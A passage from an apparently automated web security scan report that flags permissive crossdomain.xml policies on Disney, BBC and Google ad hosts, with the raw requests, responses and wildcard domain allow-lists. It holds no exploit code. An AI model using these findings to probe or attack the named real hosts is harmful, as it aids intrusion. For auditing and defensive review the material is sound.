<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.62. http://dcl2.wdpromedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl2.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Thu, 21 Apr 2011 01:15:30 GMT
Cache-Control: max-age=160
Date: Mon, 16 May 2011 01:23:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.63. http://disneycruise.disney.go.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disneycruise.disney.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:35:44 GMT
Date: Mon, 16 May 2011 01:35:02 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.64. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:04 GMT
Date: Sun, 15 May 2011 21:19:04 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.65. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:44:43 GMT
Expires: Mon, 16 May 2011 10:44:43 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 38783
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
